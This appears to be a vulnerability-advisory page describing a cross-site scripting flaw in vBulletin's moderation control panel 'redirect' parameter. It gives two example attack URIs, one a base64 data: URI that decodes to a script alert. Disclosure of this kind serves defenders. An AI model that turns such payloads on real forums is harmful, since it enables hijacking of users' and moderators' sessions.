• info
• discussion
• exploit
• solution
• references

vBulletin Moderation Control Panel 'redirect' Parameter Cross-Site Scripting Vulnerability

An attacker can exploit this issue by enticing an unsuspecting user to follow a malicious URI.

The following example URIs are available:

http://www.example.com/vB3/modcp/index.php?redirect=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
http://www.example.com/vB3/modcp/index.php?redirect={XSS}